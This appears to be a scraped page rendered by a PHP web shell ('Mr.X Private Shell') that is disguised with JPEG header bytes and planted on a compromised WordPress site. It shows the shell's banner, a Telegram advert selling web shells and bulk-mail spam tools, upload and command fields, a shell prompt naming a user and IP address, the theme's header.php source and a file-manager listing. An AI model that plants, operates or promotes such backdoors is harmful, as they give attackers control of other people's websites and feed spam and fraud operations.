����JFIF��������� Mr.X
  
  __  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

chassiw@216.73.217.25: ~ $
<!DOCTYPE html>
<!--[if (gte IE 9)|!(IE)]><!--><html <?php language_attributes(); ?> > <!--<![endif]-->

<head>
<meta charset="<?php bloginfo( 'charset' ); ?>">
<!--[if ie]><meta http-equiv='X-UA-Compatible' content="IE=edge,IE=9,IE=8,chrome=1" /><![endif]-->

<meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no" />

<?php wp_head(); ?>

</head>

<body id="body" <?php body_class() ;?>>
<?php
$logo_id        	= get_theme_mod( 'custom_logo' );
$logo_image     	= wp_get_attachment_image_src( $logo_id, 'full' );

if(class_exists( 'Redux' )) {
$options 			= get_option('kasuari_framework');
$kasuari_wrap_opt 	= $options['wrap_opt'];

$kasuari_header_scheme 		= $options['header_scheme'];
$kasuari_header_alt_logo 	= '';
	if (isset($options['header_alt_logo'])) {
		$kasuari_header_alt_logo 	= $options['header_alt_logo'];
		$kasuari_alt_logo 			= $kasuari_header_alt_logo['url'];
	}
$kasuari_head_layout  	= $options['header_1_layout'];

$kasuari_right    		= $options['header_customize_right']['enabled'];
$kasuari_center    		= $options['header_customize_center']['enabled'];
$kasuari_left     		= $options['header_customize_left']['enabled'];

$kasuari_left_display    	= $options['header_left_display'];
$kasuari_center_display    	= $options['header_center_display'];
$kasuari_right_display     	= $options['header_right_display'];

$kasuari_header_animated		= $options['header_animated'];
$fixed_header					= $options['fixed_header'];
$header_fixed_type				= $options['header_fixed_type'];
$space_fixed_alt				= $options['space_fixed_alt'];

$search_bar_style		= $options['search_bar_style'];
$header_left_float		= $options['header_left_float'];
$header_center_float	= $options['header_center_float'];
$header_right_float		= $options['header_right_float'];

$header_left_align		= $options['header_left_align'];
$header_center_align	= $options['header_center_align'];
$header_right_align		= $options['header_right_align'];

if($kasuari_head_layout == '3column-header') {
	$header_3_centered		= $options['header_3_centered'];
}
else {
	$header_3_centered		= '';
}

$header_boxed = $options['header_boxed'];
if($header_boxed == true ) {
	$head_box_class = 'boxed-head-in';
}
else  {
	$head_box_class = '';
}

if(class_exists( 'acf' )) {
	$kasuari_header_style_choice = get_field('header_style_choice');
}
?>
	<?php if(class_exists( 'Redux' ) && $kasuari_wrap_opt == 'bordered'){ ?>
	<div class="bordered top-border"></div>
	<div class="bordered bottom-border"></div>
	<div class="bordered left-border"></div>
	<div class="bordered right-border"></div>
	<?php } ?>

	<div id="preloader">
		<div id="status">&nbsp;</div>
	</div>
	
	<div id="main-wrapper" class="main-wrapper<?php if(class_exists( 'Redux' ) && $kasuari_wrap_opt == 'bordered'){ ?> bordered-main-wrap<?php } ?> clearfix">

		<?php if($fixed_header == true) {
			echo '<div id="sticky-wrap-head" class="sticky-header-wrap ' . $header_fixed_type . ' clearfix">';
		} ?>

		<!-- Header
		============================================= -->
		<header id="header" class="header-style-1-wrap inner-head-wrap <?php if(class_exists( 'acf' ) && !is_search() && $kasuari_header_style_choice == 'alternative'){ ?>alt-head<?php } ?><?php if($kasuari_header_animated == '1') { ?> animated<?php } ?> <?php echo esc_attr($head_box_class); ?> clearfix">

			<div class="container clearfix">

			<div class="header-clear <?php echo esc_attr( $header_3_centered ); ?> clearfix">
				<?php if($kasuari_head_layout == '3column-header') { ?>
				<div class="fl <?php echo esc_attr( $kasuari_left_display ); ?> <?php echo esc_attr( $header_left_float ); ?> <?php echo esc_attr( $header_left_align ); ?> clearfix">
					<?php kasuari_header_part('header/header-customize-left' ); ?>
				</div>

				<div class="fc <?php echo esc_attr( $kasuari_center_display ); ?> <?php echo esc_attr( $header_center_float ); ?> <?php echo esc_attr( $header_center_align ); ?> clearfix">
					<?php kasuari_header_part('header/header-customize-center' ); ?>
				</div>

				<div class="fr <?php echo esc_attr( $kasuari_right_display ); ?> <?php echo esc_attr( $header_right_float ); ?> <?php echo esc_attr( $header_right_align ); ?> clearfix">
					<?php kasuari_header_part('header/header-customize-right' ); ?>
				</div>
				<?php }
				if($kasuari_head_layout == '2column-header') { ?>
				<div class="fl header1-2 <?php echo esc_attr( $kasuari_left_display ); ?> <?php echo esc_attr( $header_left_float ); ?> clearfix">
					<?php kasuari_header_part('header/header-customize-left' ); ?>
				</div>

				<div class="fr header1-2 <?php echo esc_attr( $kasuari_right_display ); ?> <?php echo esc_attr( $header_right_float ); ?> clearfix">
					<?php kasuari_header_part('header/header-customize-right' ); ?>
				</div>
				<?php }
				if($kasuari_head_layout == '1column-header') { ?>
				<div class="fc <?php echo esc_attr( $kasuari_center_display ); ?> clearfix">
					<?php kasuari_header_part('header/header-customize-center' ); ?>
				</div>
				<?php } ?>
			</div>

			</div>

		</header>

		<?php if($fixed_header == true) {
			echo '</div>';
			if($kasuari_header_style_choice == 'alternative' && $space_fixed_alt == 'on') {
			echo '<div class="sticky-header-gap ' . $header_fixed_type . ' clearfix"></div>';
			}
			elseif($kasuari_header_style_choice != 'alternative') {
			echo '<div class="sticky-header-gap ' . $header_fixed_type . ' clearfix"></div>';
			}
		} ?>

		<?php
		if($search_bar_style == 'expand') {
			if($kasuari_right || $kasuari_center || $kasuari_left ) {
				if( isset($kasuari_right['kasuari-search']) || isset($kasuari_center['kasuari-search']) || isset($kasuari_left['kasuari-search']) ) {
					get_template_part('/inc/part/search-big', '');
				}
			}
		}
}
else {

if(class_exists( 'acf' )) {
	$kasuari_header_style_choice = get_field('header_style_choice');
}
?>

	<div id="preloader">
		<div id="status">&nbsp;</div>
	</div>
	
	<div class="main-wrapper clearfix">
	<!-- Header
	============================================= -->
	<header id="header" class="header-style-1-wrap inner-head-wrap <?php if(class_exists( 'acf' ) && $kasuari_header_style_choice == 'alternative'){ ?>alt-head<?php } ?> animated clearfix no-redux">

		<div class="container">

			<div class="fl">
				<div class="logo head-item">
					<?php if ( ! empty( $logo_image ) ) { ?>
					<div class="logo-image">
						<a href="<?php echo esc_url( home_url( '/' ) ); ?>">
							<img src="<?php echo esc_url( $logo_image[0] ); ?>" alt="<?php echo esc_attr( 'logo' ); ?>" />
						</a>
					</div>
					<?php }
					else { ?>
					<div class="logo-title">
						<h2 class="site-title">
							<a href="<?php echo esc_url( home_url( '/' ) ); ?>" title="<?php echo esc_attr( get_bloginfo( 'name' ) ); ?>" class="header-logo"><?php echo esc_html( get_bloginfo( 'name' ) ); ?></a>
						</h2>
					</div>
					<?php } ?>
				</div>
				<!-- end logo -->
			</div>

			<div class="fr">
				<!-- Mobile menu toggle button (hamburger/x icon) -->
				<input id="main-menu-state" type="checkbox" />
				<label class="main-menu-btn sub-menu-triger" for="main-menu-state">
				  <span class="main-menu-btn-icon"></span>
				</label>

				<!-- Primary Navigation
				============================================= -->
				<nav id="primary-menu" class="menu main-menu head-item">
					<?php kasuari_main_nav_menu(); ?>
				</nav>
				<!-- end primary menu -->

				<div class="search-wrap head-item">
					<button id="btn-search"><i class="icon-simple-line-icons-143"></i></button>
				</div>
			</div>

			<?php get_template_part('/inc/part/search-big', ''); ?>
		</div>

	</header>
<?php } ?>
<!-- HEADER END -->

Filemanager

Name Type Size Permission Actions
css Folder 0755
img Folder 0755
inc Folder 0755
js Folder 0755
languages Folder 0755
plugins Folder 0755
template Folder 0755
404.php File 738 B 0644
archive.php File 1.17 KB 0644
author.php File 2.47 KB 0644
category.php File 1.81 KB 0644
changelog.txt File 814 B 0644
class-tgm-plugin-activation.php File 161.79 KB 0644
class-tgm.php File 8.08 KB 0644
class.theme-modules.php File 0 B 0644
comments.php File 1.72 KB 0644
footer-no-footer.php File 97 B 0644
footer.php File 4.81 KB 0644
functions.php File 22.88 KB 0644
header.php File 7.71 KB 0644
index.php File 3.09 KB 0644
license.txt File 15.05 KB 0644
page.php File 363 B 0644
readme.txt File 638 B 0644
screenshot.png File 301.63 KB 0644
search.php File 1.51 KB 0644
searchform-def.php File 456 B 0644
searchform.php File 1.63 KB 0644
sidebar.php File 323 B 0644
single.php File 2.45 KB 0644
style.css File 112.98 KB 0644